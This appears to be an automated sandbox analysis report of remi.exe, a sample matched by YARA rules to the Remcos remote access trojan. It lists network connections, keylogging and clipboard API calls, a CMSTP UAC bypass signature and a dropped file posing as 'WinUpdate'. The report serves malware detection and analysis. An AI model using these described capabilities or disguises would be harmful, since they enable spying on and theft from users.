                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49775 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49825 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49824 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49827 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49828 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49829 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000006_2_004099E4
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_0040987A
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_004072B5
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004159C6
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,6_2_00409B10
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4372, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4152, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4372, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4152, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\WinUpdat\WinUpdat.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0041BB77 SystemParametersInfoW,6_2_0041BB77

                    System Summary

                    barindex
                    Source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: remi.exe PID: 4372, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: remi.exe PID: 4152, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10006FA0 OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,11_2_10006FA0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,6_2_004158B9
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_0161D3440_2_0161D344
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_0743F34A0_2_0743F34A
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_074305500_2_07430550
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_074305600_2_07430560
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_074395E00_2_074395E0
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_074391A80_2_074391A8
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_0743B0F00_2_0743B0F0
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_0743ACA80_2_0743ACA8
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_0743ACB80_2_0743ACB8
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_07439A090_2_07439A09
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_07439A180_2_07439A18
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0041D0716_2_0041D071
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004520D26_2_004520D2
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0043D0986_2_0043D098
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004371506_2_00437150
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004361AA6_2_004361AA
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004262546_2_00426254
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004313776_2_00431377
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0041E5DF6_2_0041E5DF
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0044C7396_2_0044C739
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004267CB6_2_004267CB
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0043C9DD6_2_0043C9DD
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00432A496_2_00432A49
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0043CC0C6_2_0043CC0C
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00434D226_2_00434D22
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00426E736_2_00426E73
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00440E206_2_00440E20
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0043CE3B6_2_0043CE3B
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00412F456_2_00412F45
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00452F006_2_00452F00
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00426FAD6_2_00426FAD
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_00AFD3447_2_00AFD344
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_050805537_2_05080553
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_050805607_2_05080560
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_050895E07_2_050895E0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_050891A87_2_050891A8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_0508B0F07_2_0508B0F0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_0508ACA87_2_0508ACA8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_0508ACB87_2_0508ACB8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_05089A097_2_05089A09
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_05089A187_2_05089A18
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E6B5C111_2_02E6B5C1
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E7719411_2_02E77194
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_100012CB11_2_100012CB
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1000B97011_2_1000B970
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1003224911_2_10032249
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10009AB011_2_10009AB0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10009D2011_2_10009D20
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1001F57B11_2_1001F57B
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1001B58411_2_1001B584
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1000ED8811_2_1000ED88
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_100137B011_2_100137B0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1000EFB711_2_1000EFB7
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044B04015_2_0044B040
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0043610D15_2_0043610D
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044731015_2_00447310
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044A49015_2_0044A490
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0040755A15_2_0040755A
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0043C56015_2_0043C560
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044B61015_2_0044B610
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044D6C015_2_0044D6C0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_004476F015_2_004476F0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044B87015_2_0044B870
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044081D15_2_0044081D
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0041495715_2_00414957
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_004079EE15_2_004079EE
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00407AEB15_2_00407AEB
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044AA8015_2_0044AA80
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00412AA915_2_00412AA9
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00404B7415_2_00404B74
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00404B0315_2_00404B03
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044BBD815_2_0044BBD8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00404BE515_2_00404BE5
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00404C7615_2_00404C76
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00415CFE15_2_00415CFE
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00416D7215_2_00416D72
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00446D3015_2_00446D30
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00446D8B15_2_00446D8B
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00406E8F15_2_00406E8F
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0040503816_2_00405038
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0041208C16_2_0041208C
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_004050A916_2_004050A9
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0040511A16_2_0040511A
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0043C13A16_2_0043C13A
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_004051AB16_2_004051AB
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0044930016_2_00449300
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0040D32216_2_0040D322
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0044A4F016_2_0044A4F0
